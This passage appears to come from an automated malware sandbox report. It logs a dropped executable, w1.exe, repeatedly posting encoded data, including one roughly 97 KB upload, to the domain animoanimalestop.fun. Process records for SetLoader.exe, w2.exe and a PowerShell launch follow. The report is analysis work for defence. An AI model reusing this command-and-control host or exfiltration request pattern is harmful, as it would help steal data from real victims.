                                            2024-08-25 13:43:59 UTC15331OUTData Raw: b7 b4 5e a4 d4 b6 a3 f5 a6 ae e6 29 45 32 eb cd 8b 1d d0 84 16 b4 a2 06 e4 b8 8d ff d7 f7 8c 3b 26 3c dc 57 cd d2 61 14 3c e4 3c 04 86 7d 04 fc e4 df 05 d4 3d d4 64 b6 b5 db e3 b3 84 fb b7 f0 cb 97 bd e0 0d 4c b9 7f 62 3e 15 e6 e5 65 be 71 5b 2e 08 6f 7f 67 7f 68 e6 bd 90 7d cd 60 22 31 e0 82 2d 5f 9a c0 84 9e af 56 55 06 85 31 86 4f a8 27 d6 8d c8 bb 84 44 9f 9a e9 7b 1f 20 d1 91 1e 9e c0 5c 33 67 30 7c da 1b 9b af 44 b1 33 4b 3d 5a 28 80 70 57 6f 4f c8 9c 6b 3a 54 e9 ce 9c 2d cc e4 74 61 7d 5e 2e 08 6d 48 f5 c9 a4 02 ce 62 36 8d ef 94 27 9f 6f bd d1 48 c0 03 71 a0 c2 04 ae 21 08 9f 3d 22 cd 28 80 4e 3e 74 3f ae a1 8e df 81 b6 fb 82 b8 85 2c 0d c4 10 c6 a5 7b a8 5e dd f8 8f 30 03 79 a4 f5 db a3 2f 14 23 21 e5 a7 3b 02 0f bc 25 cc 89 48 d3 97 fb d8 72 52
                                            Data Ascii: ^)E2;&<Wa<<}=dLb>eq[.ogh}`"1-_VU1O'D{ \3g0|D3K=Z(pWoOk:T-ta}^.mHb6'oHq!="(N>t?,{^0y/#!;%HrR
                                            2024-08-25 13:43:59 UTC9680OUTData Raw: c0 d0 e8 51 fe 6d 7f 80 d9 e9 39 71 6d f5 5d cf dd 6d 5c dc ed d0 a0 e9 a1 d7 7c f5 b1 e9 2c db 7d 67 52 a7 91 6e 20 e7 24 27 3f b2 cf eb 69 7f 9b 7c a4 3f 6d c0 a5 7e 50 c7 af 0d 78 c7 9d f9 ef 30 3c 76 99 54 d9 ec f8 1d ed d8 b0 a5 c4 e9 a5 05 67 25 86 14 32 1a f7 97 4d 3d b5 db 07 1b 7d d4 f0 ec 64 bf f7 a7 c4 f6 e0 d9 bc fb f2 be 30 01 e1 e9 dc 64 95 97 b2 d9 53 b9 23 7c 50 b7 7c e0 dd 9f 9f a7 23 3f 98 d7 7c 67 64 24 64 dd 90 79 c5 dd 21 39 fb a3 9f 6c cd a5 66 21 86 44 e4 86 1c 4d 5d 5c d0 d8 25 1b 9f 70 7d bc 17 c5 ce c7 93 61 e1 98 bc 65 ff 51 ee f0 28 61 75 c1 21 e7 a4 de b1 ef ef 06 e9 c7 31 00 a9 85 e5 86 1c e5 52 d5 7a a1 57 91 a1 3f 61 a1 cd 90 4b f6 bc a7 50 57 99 75 77 99 89 ce 78 a7 30 74 73 6e 7a a9 fd a4 65 65 b9 19 ef 2a e3 84 7d f2 3b
                                            Data Ascii: Qm9qm]m\|,}gRn $'?i|?m~Px0<vTg%2M=}d0dS#|P|#?|gd$dy!9lf!DM]\%p}aeQ(au!1RzW?aKPWuwx0tsnzee*};
                                            2024-08-25 13:44:00 UTC648INHTTP/1.1 204 No Content
                                            Date: Sun, 25 Aug 2024 13:43:59 GMT
                                            Connection: close
                                            v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjezYEEsj%2BUtqEzQDsjSk%2Bh1z0SZHtKflcnk779x8p%2BJrwwyVZwR%2BLVDvMC8ubGg8%2BcZcf6TIp4YP7Fj5RIvgYIP7DphRIX7B3B7CHqGIhO2Kym3yP4EKIUmxsV8WTwk63vpYA8jrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c03a4297ec454-EWR
                                            alt-svc: h3=":443"; ma=86400


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.449740172.67.195.1464435672C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-25 13:44:00 UTC463OUTPOST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                            view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            Content-Length: 745
                                            Host: animoanimalestop.fun
                                            2024-08-25 13:44:00 UTC745OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 38 0c 94 26 95 00 00 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a 32 06 9e 2c 09 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 98 ca 9a 32 06 9e 2c 68 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0c 26 0a 0a 0a 0a 0a 0a 0a 27 0a 27 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0b 0a 0a 0a 5a 41 0f 0c 0a 0a 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 ad 52 f4 3e a7 00 00 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a a7 58 fe 34 1f 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 98 ca 98 9f ca 08 0b a9 98 ca 0a aa 9f ca 0b 0b a9 98 ca 0a aa a7 58
                                            Data Ascii: 8&V(c,,y2,2,hZA&''ZAZAR>V(c,,yX4X
                                            2024-08-25 13:44:00 UTC652INHTTP/1.1 204 No Content
                                            Date: Sun, 25 Aug 2024 13:44:00 GMT
                                            Connection: close
                                            v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zs3hHb760%2Br331eHR7hmQQAO%2FwDTNfGFNcYriBo3VRyVx3HgigRduiVLMj%2Befj5wjFfMW22S9tgGLAQ5XFBTV%2BApvQcrCq%2BWLjDk2dhqNYjTGLfNkCwJQ7efyzCdkt8%2Fsy9W%2Fllbhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c03ac2c1817e5-EWR
                                            alt-svc: h3=":443"; ma=86400


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.449741172.67.195.1464435672C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-25 13:44:01 UTC463OUTPOST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                            view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            Content-Length: 212
                                            Host: animoanimalestop.fun
                                            2024-08-25 13:44:01 UTC212OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 32 92 45 1a 99 00 00 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a 38 98 4f 10 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 99 ca ca 98 ca 9b 0a 38 98 4f 10 68 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0c 26 0a 0a 0a 0a 0a 0a 0a 27 0a 27 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0b 0a 0a 0a 5a 41 0f 0c 0a 0a 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                            Data Ascii: 2EV(c,,y8O8OhZA&''ZAZA
                                            2024-08-25 13:44:01 UTC650INHTTP/1.1 204 No Content
                                            Date: Sun, 25 Aug 2024 13:44:01 GMT
                                            Connection: close
                                            v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XSVKJWOX8bY%2FPcJ58%2BIz%2FOgY9WlP6e3jP%2BJaHnVsryzZUYeGgrrHweXDcR8nnxurdndjS6HQULKBsypURlpqrri4nK0ICr0gxpFs4X4pJVX3SK4In0LEV9%2FRLj4bZNV6aiF%2BxQlWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c03b168644265-EWR
                                            alt-svc: h3=":443"; ma=86400


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.449742172.67.195.1464435672C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-25 13:44:02 UTC462OUTPOST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                            view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            Content-Length: 35
                                            Host: animoanimalestop.fun
                                            2024-08-25 13:44:02 UTC35OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                            Data Ascii:
                                            2024-08-25 13:44:02 UTC652INHTTP/1.1 204 No Content
                                            Date: Sun, 25 Aug 2024 13:44:02 GMT
                                            Connection: close
                                            v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7%2BtpVy8fwjEcnJVN2ENoMHsYg7YDqKeheJnNRj8nPhNQrVWXmsoOC16%2FSZw3rw%2BMgMkLQHsqzS9B98yMt62386kIA%2BUE3Q%2BMkwsb0K%2FQ8zSIHfVO%2F4EZgTeVbyVHNMH0j58Koc9lA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c03b6eea2438e-EWR
                                            alt-svc: h3=":443"; ma=86400


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.449743172.67.195.1464435672C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-25 13:44:03 UTC465OUTPOST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                            view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            Content-Length: 96804
                                            Host: animoanimalestop.fun
                                            2024-08-25 13:44:03 UTC15331OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 b1 ef da 18 e9 79 01 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a bb e5 d0 12 40 05 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 91 ca ac 32 39 3f 3b 32 3a af 60 65 64 6f 79 99 00 0a c7 40 6f 9b 98 c7 0f 0a c7 0e 0a c5 0a 0a 0a 0b f5 fe 0a 0a d3 2c 43 64 7e 6f 66 22 58 23 2a 49 65 78 6f 22 5e 47 23 38 2a 49 5a 5f 2a 3c 3c 3a 3a 2a 4a 2a 38 24 3e 3a 2a 4d 42 70 9b b5 47 63 69 78 65 79 65 6c 7e 2a 48 6b 79 63 69 2a 4e 63 79 7a 66 6b 73 2a 4b 6e 6b 7a 7e 6f 78 ca c9 d6 0a ba aa ac 59 73 79 7e 6f 67 a2 58 6f 6d 63 79 7e 78 73 a2 79 67 79 79 24 6f 72 6f a3 69 79 78 79 79 24 6f 72 6f a1 7d 63 64 63 64 63 7e 24 6f 72 6f a3 69 79 78 79 79 24 6f 72 6f a6 7d 63 64 66 65 6d 65 64 24 6f 72 6f a6 79 6f 78 7c 63 69 6f 79
                                            Data Ascii: yV(c,,y@29?;2:`edoy@o,Cd~of"X#*Iexo"^G#8*IZ_*<<::*J*8$>:*MBpGcixeyel~*Hkyci*Ncyzfks*Knkz~oxYsy~ogXomcy~xsygyy$oroiyxyy$oro}cdcdc~$oroiyxyy$oro}cdfemed$oroyox|cioy
                                            2024-08-25 13:44:03 UTC15331OUTData Raw: 04 80 a2 4d 4b 05 f0 99 88 db df df bf c1 e0 31 8d 48 ff 21 bf 94 07 ab db ce 74 af dc a6 f4 39 06 0e 16 41 4b 09 dd 64 e9 f0 59 be 60 8f cc 25 d5 0d 59 4a f4 08 21 aa 7e 9a b5 ca 80 1d 25 fb 0e 76 dc 73 76 24 40 5d 1e 08 bb c9 bf 56 d3 5c 7d 8f f2 ff f3 6e 53 a9 6f 0d 10 db 80 e7 4b 6b c0 b2 c2 0c 05 b6 e2 cf f3 62 26 00 47 39 15 c2 c2 63 48 37 79 0c f7 41 88 cc d9 4b ae 03 d3 b3 2c 05 ab eb 6e 0a 0b fb 29 70 bf 57 aa 18 df c0 4f 73 1b 14 38 40 4b 5b d9 7b 5a 30 4f 50 67 be d1 98 90 91 58 f1 ac 38 0b 95 29 40 75 1d ab b7 e9 9b 7f 24 64 91 aa 5a fb 98 c4 85 c2 96 76 6e 8f 3f 49 7b f0 d0 97 8d a8 38 e8 37 43 fb 7e e2 9f 2f 5f 53 e8 26 8f b0 a5 24 0f 36 16 89 ba 2e 8c e1 80 88 71 4b b0 7c ed d3 cb e1 21 60 2c 90 77 28 d3 4d c2 23 08 5f ea bf 22 01 82 1c 05
                                            Data Ascii: MK1H!t9AKdY`%YJ!~%vsv$@]V\}nSoKkb&G9cH7yAK,n)pWOs8@K[{Z0OPgX8)@u$dZvn?I{87C~/_S&$6.qK|!`,w(M#_"
                                            2024-08-25 13:44:03 UTC15331OUTData Raw: 7d c6 f7 60 ff 74 25 1c e5 cf e6 eb 23 50 2a 82 67 ab 21 ce 55 f3 7e 7e 1f a1 f1 63 70 bf 6a 23 bd 22 e3 ee b0 b4 6c 25 af 8d 47 f7 82 7c 20 13 f2 0e 69 b5 75 30 d8 e8 2a 89 b5 e5 f6 51 b8 6c e8 89 d9 de d4 64 b2 8e b5 ed a6 27 bb 84 d4 6a 4c 8b e1 69 6f ee 86 8c fd a7 d0 cd e0 84 48 c5 79 55 38 f6 78 91 19 94 d3 73 c8 6c ca b4 fd cc 2d 45 b6 af dd 31 22 bd c0 de da 62 f0 8b f8 bf b0 10 92 34 0a b4 aa 76 a2 7e a0 6f 45 e3 2d 5d 2e be 68 f6 5f 46 6b 35 5f 4a 00 1d 39 3c 9e 78 ef f0 83 9c c9 a1 ec 63 61 79 67 35 8d 9b f0 59 b0 58 e5 d5 66 11 cf e3 80 65 0c b0 12 8d 37 d5 0f d6 e3 21 1e 18 70 ad 35 6e 38 e6 5d 89 b7 21 43 11 ad 54 f6 80 d7 e2 7c a2 ef b4 9b 1d 59 bc bb 29 eb d1 82 4e f3 23 b4 ea 8d e7 e5 fa fd 9e 20 d1 43 35 6d 84 51 39 16 e0 65 28 80 6a 96
                                            Data Ascii: }`t%#P*g!U~~cpj#"l%G| iu0*Qld'jLioHyU8xsl-E1"b4v~oE-].h_Fk5_J9<xcayg5YXfe7!p5n8]!CT|Y)N# C5mQ9e(j
                                            2024-08-25 13:44:03 UTC15331OUTData Raw: e4 93 a0 51 b3 b4 e8 ec 14 02 d8 72 5a 3e 1d b3 68 36 e6 76 c1 7b 72 55 38 40 5a f9 4b fb d6 97 95 35 09 6b ec cf e9 48 fa cb 66 9c 54 c5 40 b3 3e 11 3a a0 5f 11 be ad a9 fe c4 7f 51 1a fb 4a 86 b1 4c f2 93 c2 61 b9 b7 17 20 66 cb b9 c7 1c 05 6d b3 65 55 8b 61 27 d6 e5 97 ca 6f a0 f7 61 17 c5 97 70 ee d5 9d 54 41 89 2a 7e 2d 8e 24 b6 06 9b 43 92 ab c7 b6 ee 11 bd fe d1 49 50 3a 7c e8 1d df 1c f0 5b de 3d 5d 9b f4 fc 31 45 75 78 42 ae 70 2e f1 c7 b2 9c 34 3f a2 00 8f ed 56 99 9a 32 b5 26 b1 37 cc de a7 26 f4 3b bb c4 36 dc 96 3a e2 48 75 d5 b2 f2 2b dc 16 b1 3f 7c 82 c6 10 75 1d dc c3 28 f1 46 f8 b8 3d 7e db 69 62 51 e2 83 4d 8c be fa e0 10 c5 9a 7b fc 17 15 38 fa 2e fc c4 af c2 7d 23 23 b7 45 31 1f e1 27 0e bd d3 1a f9 1f b4 e2 56 c1 9f 97 3f 75 e2 b7 ad
                                            Data Ascii: QrZ>h6v{rU8@ZK5kHfT@>:_QJLa fmeUa'oapTA*~-$CIP:|[=]1EuxBp.4?V2&7&;6:Hu+?|u(F=~ibQM{8.}##E1'V?u
                                            2024-08-25 13:44:03 UTC15331OUTData Raw: 85 ad c2 ca 67 85 85 48 95 3b 88 15 ed c2 4a 1d c1 09 5e 5a 5a 1a 26 2a 3e ca f1 46 15 f0 b8 17 04 71 d4 bd b8 9c 06 f6 f9 e0 fe f9 43 4b 85 96 c4 a5 4c 2d 7c c5 9f 0d ab 37 fa a8 16 63 0c 90 7b 2f 8b 42 af 53 e1 18 ce b8 b1 e8 df 3c 25 5c 99 fb 63 c2 ea 0f b7 99 b1 2e a0 20 cd ed 10 b3 7a 3b d9 91 fb 7a 64 a1 1a 91 49 63 bc 6d b4 96 ce 85 06 c8 b3 6b 95 ac 9d d7 5e 46 09 e2 dd 08 e8 54 9d b6 66 f5 8f a4 4e 77 c7 77 65 c0 38 b8 9d 9e 50 d7 f8 45 7f 92 9d 73 bd 29 4f 01 71 99 8e 64 6c a4 e5 c2 5a 76 64 82 59 46 22 81 e9 0d c6 70 e0 51 6e 69 ee 82 4c cc f8 19 c2 bf 71 e3 67 54 c5 1a 4d 14 21 cc 38 83 47 33 ec 81 3d 40 31 f6 13 31 f1 34 e2 75 4c 73 25 0f 91 5d 06 cb b1 46 6e 2a 9c e1 af 58 6b f7 b3 3e 1a b2 91 de 92 4b 97 d3 3c 1c 86 f1 d2 7a f8 19 86 c9 08
                                            Data Ascii: gH;J^ZZ&*>FqCKL-|7c{/BS<%\c. z;zdIcmk^FTfNwwe8PEs)OqdlZvdYF"pQniLqgTM!8G3=@114uLs%]Fn*Xk>K<z
                                            2024-08-25 13:44:03 UTC15331OUTData Raw: 22 6a 6d 08 9d d3 5a 30 1f 6f 76 3d a5 1c ef ff e2 5e 0e b2 ec 59 a0 a9 1a 82 94 ec 55 41 42 57 5b 53 ae 90 f7 95 ea fc 16 21 37 82 9f e0 2f e4 86 5c 08 4b 89 93 49 bb ea 26 31 9f eb b9 66 06 f2 c6 61 2e 3c f3 c6 4d 98 80 0d 8e 48 f7 4b 38 4b 2d 0d 79 a8 0d 92 9b 3a 14 8a 21 11 80 d8 4f 97 8f 52 25 fb d7 58 09 7c a6 7e 4e 1e db 39 c1 c0 39 81 b2 8a 7f b8 69 fc c8 19 fa 5a 70 20 3e b7 1a 5d 9c 1f ad 25 12 1d 1e ac e4 b7 79 0c 75 0e a5 a1 33 5f da 83 63 4b 21 32 e8 c5 3b 18 e9 90 82 43 58 39 87 26 53 72 a4 95 42 bf c9 f3 7a b0 34 db e6 4c ec bc b1 8d d7 b6 f8 6e 8a df 90 3b 15 1d 45 6e 0f 5e de 1a b8 6e 6a 3d 45 04 cf 96 b8 d0 c7 8d da 59 54 58 60 c7 9c 94 84 d6 ab bf b4 b8 d7 cc 7d 32 17 b5 03 5d ad 26 68 35 c7 29 09 d8 d3 47 ed 7f 4f cb 17 29 11 d3 df 0d
                                            Data Ascii: "jmZ0ov=^YUABW[S!7/\KI&1fa.<MHK8K-y:!OR%X|~N99iZp >]%yu3_cK!2;CX9&SrBz4Ln;En^nj=EYTX`}2]&h5)GO)
                                            2024-08-25 13:44:03 UTC4818OUTData Raw: 2e 96 fb 62 a0 79 03 56 66 79 59 65 c2 d3 49 e0 eb 3a 55 93 9c fe fa 8e 4e 01 29 81 ef 5d c9 b1 b6 79 78 e6 95 14 73 e4 22 6e d5 7a fe b2 7e a0 fb 73 d9 54 28 4c 5f 96 ec fd c1 58 df 23 bd 65 08 db d8 f8 68 e1 60 10 a5 46 65 48 07 e3 84 44 7d 2e 7e 75 86 93 27 71 93 8e be f7 a6 40 ea a1 74 2b f1 cc 73 28 e3 6b 5c 42 4e d3 87 33 e1 8e d3 a7 e5 67 2c a6 ab 2f c4 33 57 9d b9 84 d8 12 3f d6 65 9d 37 68 a0 95 da ac 57 19 72 f3 47 63 5c f8 91 d8 47 3f 23 b3 34 60 41 d2 b9 07 0d dc cb 37 ee e2 d1 f6 a8 3f df 98 37 d4 4e b1 55 fd 04 95 d6 29 09 28 90 17 3f bc 73 39 4b 3b 89 0c e3 e5 0c 21 ef bf 43 ed 8d dc 8e 74 07 d2 62 b2 5e 8b d5 92 43 be 73 f0 d6 41 b5 f6 19 da 60 6e a2 b0 5a b8 b1 4e b8 59 26 53 53 99 0b ed 6a 95 bf 49 5a 40 8f 42 a6 82 de a9 c5 de e9 b4 70
                                            Data Ascii: .byVfyYeI:UN)]yxs"nz~sT(L_X#eh`FeHD}.~u'q@t+s(k\BN3g,/3W?e7hWrGc\G?#4`A7?7NU)(?s9K;!Ctb^CsA`nZNY&SSjIZ@Bp
                                            2024-08-25 13:44:04 UTC648INHTTP/1.1 204 No Content
                                            Date: Sun, 25 Aug 2024 13:44:04 GMT
                                            Connection: close
                                            v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lAmomQB0FIgQdA29rEAlsRe%2FRIMznxrm4%2FU6Jd3s0xWSNQv0KTjPBHxxm8PKPHTKu%2B5Ukqtf0tTJ6S%2BNEi6YuS5cn32WV1lCHWXlZGa4VNcifDCogHBs%2BJJHyBUqhCocnyzUzArNNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c03c08a4443d9-EWR
                                            alt-svc: h3=":443"; ma=86400


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.449744172.67.195.1464435672C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-25 13:44:05 UTC462OUTPOST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                            view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            Content-Length: 35
                                            Host: animoanimalestop.fun
                                            2024-08-25 13:44:05 UTC35OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                            Data Ascii:
                                            2024-08-25 13:44:05 UTC526INHTTP/1.1 204 No Content
                                            Date: Sun, 25 Aug 2024 13:44:05 GMT
                                            Connection: close
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rJOPjqXOdTLqYmels9iY%2BMxwkM92KI7h8tH1RK7QUaJ80fQlEBF9rpV0tuHpfNWST75t0i8vGrTMbuw7BtuAimOSfn%2BzBDNBFB3v1IqIszghS58Dypk4ljq04%2FpVlnO%2B8YMRgM4fA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c03c84e5c18b1-EWR
                                            alt-svc: h3=":443"; ma=86400


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:09:43:03
                                            Start date:25/08/2024
                                            Path:C:\Users\user\Desktop\SetLoader.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SetLoader.exe"
                                            Imagebase:0x610000
                                            File size:15'458'400 bytes
                                            MD5 hash:68ADCB0C0E4419351AE5371732EA78DD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:4
                                            Start time:09:43:37
                                            Start date:25/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe"
                                            Imagebase:0x400000
                                            File size:834'649'568 bytes
                                            MD5 hash:739213A2496D01E16DDC02B6898A81AD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:09:44:15
                                            Start date:25/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
                                            Imagebase:0x140000000
                                            File size:831'071'200 bytes
                                            MD5 hash:FCE277E4928FDE19CD8BAD5CE1997792
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:09:44:17
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
